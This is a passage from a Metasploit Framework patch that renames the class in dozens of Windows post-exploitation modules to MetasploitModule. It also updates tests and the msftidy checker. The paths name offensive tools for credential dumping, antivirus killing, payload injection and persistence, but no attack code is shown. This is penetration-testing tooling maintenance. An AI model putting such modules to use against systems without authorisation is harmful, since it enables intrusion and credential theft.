'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Auxiliary::Report include Msf::Post::Windows::Priv diff --git a/modules/post/windows/gather/local_admin_search_enum.rb b/modules/post/windows/gather/local_admin_search_enum.rb index 96fbc11ccf..030a5c8874 100644 --- a/modules/post/windows/gather/local_admin_search_enum.rb +++ b/modules/post/windows/gather/local_admin_search_enum.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Priv include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/lsa_secrets.rb b/modules/post/windows/gather/lsa_secrets.rb index 812691a029..934785f84f 100644 --- a/modules/post/windows/gather/lsa_secrets.rb +++ b/modules/post/windows/gather/lsa_secrets.rb @@ -8,7 +8,7 @@ require 'msf/core/post/windows/priv' require 'msf/core/post/common' require 'msf/core/post/windows/registry' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Priv include Msf::Post::Common include Msf::Post::Windows::Registry diff --git a/modules/post/windows/gather/memory_grep.rb b/modules/post/windows/gather/memory_grep.rb index 936aae5cf2..6ef9eca087 100644 --- a/modules/post/windows/gather/memory_grep.rb +++ b/modules/post/windows/gather/memory_grep.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post def initialize(info={}) super( update_info(info, diff --git a/modules/post/windows/gather/netlm_downgrade.rb b/modules/post/windows/gather/netlm_downgrade.rb index b1dca4c2a8..a7f329325d 100644 --- a/modules/post/windows/gather/netlm_downgrade.rb +++ b/modules/post/windows/gather/netlm_downgrade.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Registry include Msf::Post::Windows::WindowsServices diff --git a/modules/post/windows/gather/ntds_location.rb b/modules/post/windows/gather/ntds_location.rb index a875df954e..a6ad03f1d6 100644 --- a/modules/post/windows/gather/ntds_location.rb +++ b/modules/post/windows/gather/ntds_location.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit4 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Windows::Registry diff --git a/modules/post/windows/gather/outlook.rb b/modules/post/windows/gather/outlook.rb index 92269c8d9c..a6f24c8637 100644 --- a/modules/post/windows/gather/outlook.rb +++ b/modules/post/windows/gather/outlook.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Registry include Msf::Post::Windows::Powershell diff --git a/modules/post/windows/gather/phish_windows_credentials.rb b/modules/post/windows/gather/phish_windows_credentials.rb index f01d8c6b95..b8c03bb672 100644 --- a/modules/post/windows/gather/phish_windows_credentials.rb +++ b/modules/post/windows/gather/phish_windows_credentials.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Registry include Msf::Post::Windows::Powershell diff --git a/modules/post/windows/gather/resolve_sid.rb b/modules/post/windows/gather/resolve_sid.rb index d0ead5f552..6cb5ed8b10 100644 --- a/modules/post/windows/gather/resolve_sid.rb +++ b/modules/post/windows/gather/resolve_sid.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Accounts diff --git a/modules/post/windows/gather/reverse_lookup.rb b/modules/post/windows/gather/reverse_lookup.rb index 99cee3b42e..4b42bb765c 100644 --- a/modules/post/windows/gather/reverse_lookup.rb +++ b/modules/post/windows/gather/reverse_lookup.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post def initialize(info={}) super( update_info( info, diff --git a/modules/post/windows/gather/screen_spy.rb b/modules/post/windows/gather/screen_spy.rb index f351301a9e..1dcd1e6638 100644 --- a/modules/post/windows/gather/screen_spy.rb +++ b/modules/post/windows/gather/screen_spy.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rbconfig' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post def initialize(info={}) super( update_info(info, 'Name' => 'Windows Gather Screen Spy', diff --git a/modules/post/windows/gather/smart_hashdump.rb b/modules/post/windows/gather/smart_hashdump.rb index 4a1f6c4dba..c4dcabaef3 100644 --- a/modules/post/windows/gather/smart_hashdump.rb +++ b/modules/post/windows/gather/smart_hashdump.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Windows::Priv diff --git a/modules/post/windows/gather/tcpnetstat.rb b/modules/post/windows/gather/tcpnetstat.rb index 76566231ff..613d33ee13 100644 --- a/modules/post/windows/gather/tcpnetstat.rb +++ b/modules/post/windows/gather/tcpnetstat.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/usb_history.rb b/modules/post/windows/gather/usb_history.rb index 17af8ff7fc..81ae0ae080 100644 --- a/modules/post/windows/gather/usb_history.rb +++ b/modules/post/windows/gather/usb_history.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Priv diff --git a/modules/post/windows/gather/win_privs.rb b/modules/post/windows/gather/win_privs.rb index acb6e8dfa7..eb3b3caa19 100644 --- a/modules/post/windows/gather/win_privs.rb +++ b/modules/post/windows/gather/win_privs.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Priv diff --git a/modules/post/windows/gather/wmic_command.rb b/modules/post/windows/gather/wmic_command.rb index 65af916b48..fa285c2a20 100644 --- a/modules/post/windows/gather/wmic_command.rb +++ b/modules/post/windows/gather/wmic_command.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::WMIC diff --git a/modules/post/windows/gather/word_unc_injector.rb b/modules/post/windows/gather/word_unc_injector.rb index 2c727a4677..b0bc6f0bc3 100644 --- a/modules/post/windows/gather/word_unc_injector.rb +++ b/modules/post/windows/gather/word_unc_injector.rb @@ -18,7 +18,7 @@ require 'msf/core' # for creating files require 'rex/zip' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Windows::Priv diff --git a/modules/post/windows/manage/add_user_domain.rb b/modules/post/windows/manage/add_user_domain.rb index 7eae317a56..d6a5ac35d2 100644 --- a/modules/post/windows/manage/add_user_domain.rb +++ b/modules/post/windows/manage/add_user_domain.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Priv diff --git a/modules/post/windows/manage/autoroute.rb b/modules/post/windows/manage/autoroute.rb index a894ae01d3..7a044401a9 100644 --- a/modules/post/windows/manage/autoroute.rb +++ b/modules/post/windows/manage/autoroute.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post def initialize(info={}) diff --git a/modules/post/windows/manage/change_password.rb b/modules/post/windows/manage/change_password.rb index 889f5af7b9..32d3a7bea2 100644 --- a/modules/post/windows/manage/change_password.rb +++ b/modules/post/windows/manage/change_password.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post def initialize(info={}) super(update_info(info, diff --git a/modules/post/windows/manage/clone_proxy_settings.rb b/modules/post/windows/manage/clone_proxy_settings.rb index c270e7bd94..400396dd72 100644 --- a/modules/post/windows/manage/clone_proxy_settings.rb +++ b/modules/post/windows/manage/clone_proxy_settings.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Auxiliary::Report diff --git a/modules/post/windows/manage/delete_user.rb b/modules/post/windows/manage/delete_user.rb index 5cc08d1e83..e0728d84d7 100644 --- a/modules/post/windows/manage/delete_user.rb +++ b/modules/post/windows/manage/delete_user.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Accounts diff --git a/modules/post/windows/manage/download_exec.rb b/modules/post/windows/manage/download_exec.rb index b920f64184..5a0dc0d74e 100644 --- a/modules/post/windows/manage/download_exec.rb +++ b/modules/post/windows/manage/download_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File diff --git a/modules/post/windows/manage/driver_loader.rb b/modules/post/windows/manage/driver_loader.rb index 9558084429..4e4683ffe3 100644 --- a/modules/post/windows/manage/driver_loader.rb +++ b/modules/post/windows/manage/driver_loader.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Windows::Priv diff --git a/modules/post/windows/manage/enable_rdp.rb b/modules/post/windows/manage/enable_rdp.rb index e798ac70a0..55a67d5b42 100644 --- a/modules/post/windows/manage/enable_rdp.rb +++ b/modules/post/windows/manage/enable_rdp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Accounts include Msf::Post::Windows::Registry diff --git a/modules/post/windows/manage/enable_support_account.rb b/modules/post/windows/manage/enable_support_account.rb index c5a949c3f6..6f90cc8129 100644 --- a/modules/post/windows/manage/enable_support_account.rb +++ b/modules/post/windows/manage/enable_support_account.rb @@ -1,7 +1,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Registry include Msf::Post::Windows::Priv diff --git a/modules/post/windows/manage/exec_powershell.rb b/modules/post/windows/manage/exec_powershell.rb index 11b6659f6b..7894086acc 100644 --- a/modules/post/windows/manage/exec_powershell.rb +++ b/modules/post/windows/manage/exec_powershell.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'rex' require 'msf/core/post/windows/powershell' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Powershell def initialize(info={}) diff --git a/modules/post/windows/manage/forward_pageant.rb b/modules/post/windows/manage/forward_pageant.rb index d8dbf4ee18..e5cba36cef 100644 --- a/modules/post/windows/manage/forward_pageant.rb +++ b/modules/post/windows/manage/forward_pageant.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'tmpdir' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Priv def initialize(info = {}) diff --git a/modules/post/windows/manage/ie_proxypac.rb b/modules/post/windows/manage/ie_proxypac.rb index 82ff84eb6b..26aaaef4f7 100644 --- a/modules/post/windows/manage/ie_proxypac.rb +++ b/modules/post/windows/manage/ie_proxypac.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Priv include Msf::Post::File diff --git a/modules/post/windows/manage/inject_ca.rb b/modules/post/windows/manage/inject_ca.rb index f86f5cdf0d..26261c7c52 100644 --- a/modules/post/windows/manage/inject_ca.rb +++ b/modules/post/windows/manage/inject_ca.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post def initialize(info={}) super(update_info(info, diff --git a/modules/post/windows/manage/inject_host.rb b/modules/post/windows/manage/inject_host.rb index 0151db3970..d5333cf80f 100644 --- a/modules/post/windows/manage/inject_host.rb +++ b/modules/post/windows/manage/inject_host.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post def initialize(info={}) super(update_info(info, diff --git a/modules/post/windows/manage/killav.rb b/modules/post/windows/manage/killav.rb index fb86ce4401..826bbc8f07 100644 --- a/modules/post/windows/manage/killav.rb +++ b/modules/post/windows/manage/killav.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'set' -class Metasploit4 < Msf::Post +class MetasploitModule < Msf::Post def initialize(info={}) super(update_info(info, diff --git a/modules/post/windows/manage/migrate.rb b/modules/post/windows/manage/migrate.rb index 5dd4e6259d..671ee5670f 100644 --- a/modules/post/windows/manage/migrate.rb +++ b/modules/post/windows/manage/migrate.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post def initialize(info={}) super( update_info( info, diff --git a/modules/post/windows/manage/mssql_local_auth_bypass.rb b/modules/post/windows/manage/mssql_local_auth_bypass.rb index 5d14a36694..c6fedab05f 100644 --- a/modules/post/windows/manage/mssql_local_auth_bypass.rb +++ b/modules/post/windows/manage/mssql_local_auth_bypass.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/post/windows/mssql' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::MSSQL diff --git a/modules/post/windows/manage/multi_meterpreter_inject.rb b/modules/post/windows/manage/multi_meterpreter_inject.rb index 4900e1fc64..83ba7c78c0 100644 --- a/modules/post/windows/manage/multi_meterpreter_inject.rb +++ b/modules/post/windows/manage/multi_meterpreter_inject.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post def initialize(info={}) diff --git a/modules/post/windows/manage/nbd_server.rb b/modules/post/windows/manage/nbd_server.rb index 41f786ac8c..2395a2faa7 100644 --- a/modules/post/windows/manage/nbd_server.rb +++ b/modules/post/windows/manage/nbd_server.rb @@ -13,7 +13,7 @@ # Mississippi State University National Forensics Training Center # http://msu-nftc.org -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post def initialize(info={}) super( update_info( info, diff --git a/modules/post/windows/manage/payload_inject.rb b/modules/post/windows/manage/payload_inject.rb index 10c6317646..adfb373da6 100644 --- a/modules/post/windows/manage/payload_inject.rb +++ b/modules/post/windows/manage/payload_inject.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/post/common' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Common diff --git a/modules/post/windows/manage/portproxy.rb b/modules/post/windows/manage/portproxy.rb index 2fc0584665..73d139ba05 100644 --- a/modules/post/windows/manage/portproxy.rb +++ b/modules/post/windows/manage/portproxy.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Priv def initialize(info={}) diff --git a/modules/post/windows/manage/powershell/exec_powershell.rb b/modules/post/windows/manage/powershell/exec_powershell.rb index 8707cb705e..ae8b15ef74 100644 --- a/modules/post/windows/manage/powershell/exec_powershell.rb +++ b/modules/post/windows/manage/powershell/exec_powershell.rb @@ -17,7 +17,7 @@ require 'zlib' # TODO: check if this can be done with REX require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Powershell def initialize(info={}) diff --git a/modules/post/windows/manage/powershell/load_script.rb b/modules/post/windows/manage/powershell/load_script.rb index e3d270f9e9..edad0d8571 100644 --- a/modules/post/windows/manage/powershell/load_script.rb +++ b/modules/post/windows/manage/powershell/load_script.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Powershell def initialize(info={}) diff --git a/modules/post/windows/manage/pptp_tunnel.rb b/modules/post/windows/manage/pptp_tunnel.rb index 4f71034b08..2dfc967798 100644 --- a/modules/post/windows/manage/pptp_tunnel.rb +++ b/modules/post/windows/manage/pptp_tunnel.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Windows::Priv diff --git a/modules/post/windows/manage/priv_migrate.rb b/modules/post/windows/manage/priv_migrate.rb index 45d2de743d..8030f78575 100644 --- a/modules/post/windows/manage/priv_migrate.rb +++ b/modules/post/windows/manage/priv_migrate.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Priv diff --git a/modules/post/windows/manage/pxeexploit.rb b/modules/post/windows/manage/pxeexploit.rb index 8692ed4a64..2ef7e54b0f 100644 --- a/modules/post/windows/manage/pxeexploit.rb +++ b/modules/post/windows/manage/pxeexploit.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Auxiliary::Report diff --git a/modules/post/windows/manage/reflective_dll_inject.rb b/modules/post/windows/manage/reflective_dll_inject.rb index f52eac1e24..93f47f6f5e 100644 --- a/modules/post/windows/manage/reflective_dll_inject.rb +++ b/modules/post/windows/manage/reflective_dll_inject.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/post/windows/reflective_dll_injection' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::ReflectiveDLLInjection diff --git a/modules/post/windows/manage/remove_ca.rb b/modules/post/windows/manage/remove_ca.rb index 2a2437d0d2..4df9dd274e 100644 --- a/modules/post/windows/manage/remove_ca.rb +++ b/modules/post/windows/manage/remove_ca.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post def initialize(info={}) super( update_info( info, diff --git a/modules/post/windows/manage/remove_host.rb b/modules/post/windows/manage/remove_host.rb index 9f78208ea3..733af81ad7 100644 --- a/modules/post/windows/manage/remove_host.rb +++ b/modules/post/windows/manage/remove_host.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post def initialize(info={}) super( update_info( info, diff --git a/modules/post/windows/manage/rpcapd_start.rb b/modules/post/windows/manage/rpcapd_start.rb index b49600378b..bd917e2343 100644 --- a/modules/post/windows/manage/rpcapd_start.rb +++ b/modules/post/windows/manage/rpcapd_start.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Windows::Registry diff --git a/modules/post/windows/manage/run_as.rb b/modules/post/windows/manage/run_as.rb index 36137acf65..c471b7042b 100644 --- a/modules/post/windows/manage/run_as.rb +++ b/modules/post/windows/manage/run_as.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Windows::Priv include Msf::Post::Windows::Runas diff --git a/modules/post/windows/manage/sdel.rb b/modules/post/windows/manage/sdel.rb index a2691cc1d4..f3cb0e7f49 100644 --- a/modules/post/windows/manage/sdel.rb +++ b/modules/post/windows/manage/sdel.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Priv include Msf::Post::File diff --git a/modules/post/windows/manage/smart_migrate.rb b/modules/post/windows/manage/smart_migrate.rb index 9abc02bc75..51a7bae487 100644 --- a/modules/post/windows/manage/smart_migrate.rb +++ b/modules/post/windows/manage/smart_migrate.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Module::Deprecated diff --git a/modules/post/windows/manage/sticky_keys.rb b/modules/post/windows/manage/sticky_keys.rb index ce5bdbc771..e807ae2caf 100644 --- a/modules/post/windows/manage/sticky_keys.rb +++ b/modules/post/windows/manage/sticky_keys.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Windows::Registry diff --git a/modules/post/windows/manage/vss_create.rb b/modules/post/windows/manage/vss_create.rb index a377af66a8..a4ce9d424c 100644 --- a/modules/post/windows/manage/vss_create.rb +++ b/modules/post/windows/manage/vss_create.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Priv include Msf::Post::Windows::ShadowCopy diff --git a/modules/post/windows/manage/vss_list.rb b/modules/post/windows/manage/vss_list.rb index 35737fb343..3d3d1c5572 100644 --- a/modules/post/windows/manage/vss_list.rb +++ b/modules/post/windows/manage/vss_list.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Priv include Msf::Post::Windows::ShadowCopy diff --git a/modules/post/windows/manage/vss_mount.rb b/modules/post/windows/manage/vss_mount.rb index d71fe54b43..36b43bfe00 100644 --- a/modules/post/windows/manage/vss_mount.rb +++ b/modules/post/windows/manage/vss_mount.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Priv include Msf::Post::Windows::ShadowCopy diff --git a/modules/post/windows/manage/vss_set_storage.rb b/modules/post/windows/manage/vss_set_storage.rb index c61fd6e128..2a969572d8 100644 --- a/modules/post/windows/manage/vss_set_storage.rb +++ b/modules/post/windows/manage/vss_set_storage.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Priv include Msf::Post::Windows::ShadowCopy diff --git a/modules/post/windows/manage/vss_storage.rb b/modules/post/windows/manage/vss_storage.rb index 599902d94c..e94a6a68e4 100644 --- a/modules/post/windows/manage/vss_storage.rb +++ b/modules/post/windows/manage/vss_storage.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Priv include Msf::Post::Windows::ShadowCopy diff --git a/modules/post/windows/manage/webcam.rb b/modules/post/windows/manage/webcam.rb index eb156773d4..b309721d89 100644 --- a/modules/post/windows/manage/webcam.rb +++ b/modules/post/windows/manage/webcam.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Auxiliary::Report diff --git a/modules/post/windows/recon/computer_browser_discovery.rb b/modules/post/windows/recon/computer_browser_discovery.rb index cc2ad55784..0a87c7dc3b 100644 --- a/modules/post/windows/recon/computer_browser_discovery.rb +++ b/modules/post/windows/recon/computer_browser_discovery.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Auxiliary::Report diff --git a/modules/post/windows/recon/outbound_ports.rb b/modules/post/windows/recon/outbound_ports.rb index 31196ce2c6..6c7c9f5460 100644 --- a/modules/post/windows/recon/outbound_ports.rb +++ b/modules/post/windows/recon/outbound_ports.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Priv def initialize(info={}) diff --git a/modules/post/windows/recon/resolve_ip.rb b/modules/post/windows/recon/resolve_ip.rb index 4e3028f341..2734a2655d 100644 --- a/modules/post/windows/recon/resolve_ip.rb +++ b/modules/post/windows/recon/resolve_ip.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post def initialize(info={}) super( update_info( info, diff --git a/modules/post/windows/wlan/wlan_bss_list.rb b/modules/post/windows/wlan/wlan_bss_list.rb index 00baa5c710..e1b324d38a 100644 --- a/modules/post/windows/wlan/wlan_bss_list.rb +++ b/modules/post/windows/wlan/wlan_bss_list.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Auxiliary::Report def initialize(info={}) diff --git a/modules/post/windows/wlan/wlan_current_connection.rb b/modules/post/windows/wlan/wlan_current_connection.rb index a34db4f8c2..e4c9f60808 100644 --- a/modules/post/windows/wlan/wlan_current_connection.rb +++ b/modules/post/windows/wlan/wlan_current_connection.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Auxiliary::Report def initialize(info={}) diff --git a/modules/post/windows/wlan/wlan_disconnect.rb b/modules/post/windows/wlan/wlan_disconnect.rb index 20ef90546a..284203dc98 100644 --- a/modules/post/windows/wlan/wlan_disconnect.rb +++ b/modules/post/windows/wlan/wlan_disconnect.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Auxiliary::Report def initialize(info={}) diff --git a/modules/post/windows/wlan/wlan_profile.rb b/modules/post/windows/wlan/wlan_profile.rb index b16b0965e7..ab7d8e4252 100644 --- a/modules/post/windows/wlan/wlan_profile.rb +++ b/modules/post/windows/wlan/wlan_profile.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Auxiliary::Report def initialize(info={}) diff --git a/spec/file_fixtures/modules/auxiliary/auxiliary_tidy.rb b/spec/file_fixtures/modules/auxiliary/auxiliary_tidy.rb index 22f23fd1ae..4296c95404 100644 --- a/spec/file_fixtures/modules/auxiliary/auxiliary_tidy.rb +++ b/spec/file_fixtures/modules/auxiliary/auxiliary_tidy.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary def initialize(info = {}) super( update_info( @@ -19,4 +19,3 @@ class Metasploit < Msf::Auxiliary ) end end - diff --git a/spec/file_fixtures/modules/auxiliary/auxiliary_untidy.rb b/spec/file_fixtures/modules/auxiliary/auxiliary_untidy.rb index d6ba38e2ef..0992ae4d3e 100644 --- a/spec/file_fixtures/modules/auxiliary/auxiliary_untidy.rb +++ b/spec/file_fixtures/modules/auxiliary/auxiliary_untidy.rb @@ -6,7 +6,7 @@ require 'msf/core' # XXX: invalid super class for an auxiliary module -class Metasploit < Msf::Exploit +class MetasploitModule < Msf::Exploit # XXX: auxiliary modules don't use Rank Rank = LowRanking def initialize(info = {}) @@ -22,4 +22,3 @@ class Metasploit < Msf::Exploit ) end end - diff --git a/spec/lib/msf/core/modules/loader/base_spec.rb b/spec/lib/msf/core/modules/loader/base_spec.rb index d04a9f03e6..ef058b2fed 100644 --- a/spec/lib/msf/core/modules/loader/base_spec.rb +++ b/spec/lib/msf/core/modules/loader/base_spec.rb @@ -21,7 +21,7 @@ RSpec.describe Msf::Modules::Loader::Base do let(:module_content) do <<-EOS - class Metasploit < Msf::Auxiliary + class MetasploitModule < Msf::Auxiliary # fully-qualified name is Msf::GoodRanking, so this will failing if lexical scope is not captured Rank = GoodRanking end @@ -309,7 +309,7 @@ RSpec.describe Msf::Modules::Loader::Base do module Msf module Modules module Mod617578696c696172792f72737065632f6d6f636b - class Metasploit < Msf::Auxiliary + class MetasploitModule < Msf::Auxiliary end end @@ -442,10 +442,10 @@ RSpec.describe Msf::Modules::Loader::Base do allow(@namespace_module).to receive(:module_eval_with_lexical_scope).with(module_content, module_path) allow(@namespace_module).to receive(:const_defined?).with('Metasploit3', false).and_return(false) allow(@namespace_module).to receive(:const_defined?).with('Metasploit4', false).and_return(false) - allow(@namespace_module).to receive(:const_defined?).with('Metasploit', false).and_return(true) + allow(@namespace_module).to receive(:const_defined?).with('MetasploitModule', false).and_return(true) allow(@namespace_module).to receive(:const_get).with('Metasploit3', false).and_return(false) allow(@namespace_module).to receive(:const_get).with('Metasploit4', false).and_return(false) - allow(@namespace_module).to receive(:const_get).with('Metasploit', false).and_return(true) + allow(@namespace_module).to receive(:const_get).with('MetasploitModule', false).and_return(true) allow(@namespace_module).to receive(:module_load_warnings) allow(subject).to receive(:namespace_module_transaction).and_yield(@namespace_module) @@ -816,7 +816,7 @@ RSpec.describe Msf::Modules::Loader::Base do expect(namespace_module).not_to eq @existent_namespace_module expect { - namespace_module::Metasploit3 + namespace_module::MetasploitModule }.to raise_error(NameError) true diff --git a/tools/dev/msftidy.rb b/tools/dev/msftidy.rb index 183f5c68cf..b4bb2d3b1c 100755 --- a/tools/dev/msftidy.rb +++ b/tools/dev/msftidy.rb @@ -477,7 +477,7 @@ class Msftidy return if @module_type == 'payloads' # get the super class in an ugly way - unless (super_class = @source.scan(/class Metasploit\d?\s+<\s+(\S+)/).flatten.first) + unless (super_class = @source.scan(/class Metasploit(?:\d|Module)\s+<\s+(\S+)/).flatten.first) error('Unable to determine super class') return end @@ -509,6 +509,12 @@ class Msftidy end end + def check_bad_class_name + if @source =~ /^\s*class (Metasploit\d+)\s* Date: Tue, 8 Mar 2016 10:10:10 -0600 Subject: [PATCH 518/686] Escape HTML for KB and update rspec --- data/markdown_doc/post_demo_template.erb | 4 +- lib/msf/util/document_generator/normalizer.rb | 54 ++++++++++--------- .../document_generator/normalizer_spec.rb | 20 +++---- 3 files changed, 41 insertions(+), 37 deletions(-) diff --git 